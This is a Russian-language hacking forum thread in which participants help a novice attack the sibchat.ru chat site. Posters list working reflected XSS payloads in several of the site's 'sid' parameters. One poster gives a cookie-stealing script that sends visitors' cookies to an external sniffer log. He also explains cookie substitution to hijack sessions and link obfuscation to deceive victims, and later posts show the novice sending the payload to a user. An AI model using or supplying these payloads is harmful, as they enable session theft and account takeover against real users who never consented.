|
Ну помогите кто-нибудь..
Посмотрите чат http://sibchat.ru может что-нибудь можно с ним сделать...
Спасибо второй раз. |
была уже тема такая!! Дубляж
|
пассивная XSS:
http://www.sibchat.ru/gallery.php?sid='><script>alert(/Kaban/)</script> |
Kaban, молодец. Ксс рабочая, проверял.
http://www.sibchat.ru/gallery.php?sid='><script>alert(document.cookie)</script> Впринципе считаю вопрос исчерпаным. Тему пока что закрывать не буду, может сам ещё найду что нибудь, или другие выложут. Но за оффтоп буду ставить минусы. |
А что можно через Xss сделать, и дайте пожалуйста ссылку, где можно подробно об Xss узнать....
Спасибо, что ответили... |
Вот это почитай
http://forum.antichat.ru/thread24312-xss.html http://forum.antichat.ru/thread20140.html |
И еще
http://forum.antichat.ru/thread7083-%CD%E5%E1%EE%EB%FC%F8%EE%E9+faq+(XSS).html http://forum.antichat.ru/thread14424-%CA%E0%EA+%E7%E0%F8%E8%F4%F0%EE%E2%E0%F2%FC+%F1%F1 %FB%EB%EA%F3.html http://forum.antichat.ru/thread19997-%DD%ED%F6%E8%EA%EB%EE%EF%E5%E4%E8%FF+%F3%FF%E7%E2% E8%EC%FB%F5+%F1%EA%F0%E8%EF%F2%EE%E2.html И еще по юзай гугл: Цитата:
|
одни только xss
http://www.sibchat.ru/card_help.php?sid=%22%3E%3Cscript%3Ealert()%3C/script%3E http://www.sibchat.ru/register.php?sid=%3C/script%3E%3Cscript%3Ealert()%3C/script%3E |
Можно отсюда http://forum.chita.ru/
Если версия форума реально 2.06 то топаем сюда http://www.securitylab.ru/vulnerability/203209.php |
И ещё..
Показывает comp_id, то есть можно предположить что для бана они используют comp_id. http://www.sibchat.ru/card_help.php?sid="><script>alert(document.cookie) </script> ------------- Здесь то же самое: http://www.sibchat.ru/register.php?sid="><script>alert(document.cookie)</script> Только ещё вылазиет такая бяка: Цитата:
ЗЫ Все три ксс добавлю в f.a.q. по чатам |
Ответьте пожалуйста на такой вопрос. Куки когда считываются, куда они считываются, где их прочесть, то можно?
|
в логе сниффера... /log.php (или как там у тебя...)
в QUERY: session_id= pass_hash= |
Тоисть это надо писать к примеру http://antichat.ru/cgi-bin/s.jpg?? если да, то между какими строчками этот лог вписывать?
|
Слушай.. Хватит тупить.. Я тебе в ПМ почти статью написал, как юзать это всё дело. Мне её ещё сюда кинуть что бы ты увидел?
|
Да не злитесь вы на меня, ну если ламер я, учусь, а как всё сразу понять, я не могу понять, что куда писать и где смотреть куки эти или как, или id, что ламеру обьясние пжалста подробнее.. ;-)
|
Цитата:
http://antichat.ru/sniff/log.php - это лог... в котором ты смотришь результаты... |
Вот всё что было в ПМ, спрашивай по тексту, что тебе не понятно.
================================================= Цитата:
Если я правльно тебя понял, то ты про это. Вот одна из тех ксс. В теле тега <script> ты должен прописать путь на сниффер. Если использовать сниффер от античата, то запрос будет таким: http://www.sibchat.ru/card_help.php?sid="><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script> Лог находится здесь: http://antichat.ru/sniff/log.php В поле QUERY должны высветится разнообразные символы. Это и есть куки. Потом с помощью Оперы или Кукиэдитора делаешь подмену куков, и всё. Можешь так же воспользоватся скриптом от Дрона: http://forum.antichat.ru/threadnav22898-1-10.html Всё. Дальше уже только нужен твой мозг. |
Это получатся мне надо вписать сниффер вместо document.cookie? а жертва должна по ссылке пройти*?
|
Всё Slip вроде понял, буду юзать, я вот подумал может кто тел. даст я позвоню, проще будет...
|
Вот насчёт телефона эт вряд ли) Ладно, разбирайся. Будут вопросы, спрашивай.
|
Ну ладно с тел-ом забыли, вот ещё два вопроса, где взять куиэдитор не могу найти в нете, или как их подменить с помощью оперы?
|
Хм..... я отправил ссылку со сниффером, он сходил по ней а в логе ни чего нету? что это может быть?
|
Дык куки надо же послать. А не просто давать ссылку на gif файл :-D
|
Опа что-то новое такого я не слышал, попрошу пжалста обьяснитья чайнику...
|
Полное название Cookie Editor. А зачем искать? Если есть на ачате=\
http://antichat.ru/soft/CookieEditorSetup.exe |
Обьясинте пожалуйста, как куки то отправить со сниффером?
|
Цитата:
Цитата:
|
Это получается надо только отправить ссылку на сниффер? юрез по ней зайдёт, и его id в логе?
|
Не ссылку на снифер. А тот полный запрос, который я привёл. Вместе со <script> и т.д. И дал ссылку на скрипт от Дрона, зашифруешь ссылку, что бы он ничего не просёк. Хватит спрашивать, просто пробуй.
|
После этого сниффера, что должно произойти?, я отправляю вроде заходят по ссылке, нов логе даже сайт не указан не говоря уже про Query там вообще ни чего нету
|
Ты отправлял http://antichat.ru/cgi-bin/s.jpg ?
Или http://www.sibchat.ru/card_help.php?sid="><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script> ? |
http://www.sibchat.ru/card_help.php?sid="><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script> и что после этого должно быть? Вот попробуй даже сам.
|
Slip, ну что там я правильно всё сделал? Я отправлял в поле сообщение вот это http://www.sibchat.ru/card_help.php?sid="><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script> кому отправлял он заходил, но в логе ни чего.
|
Slip??
|
| Время: 08:25 |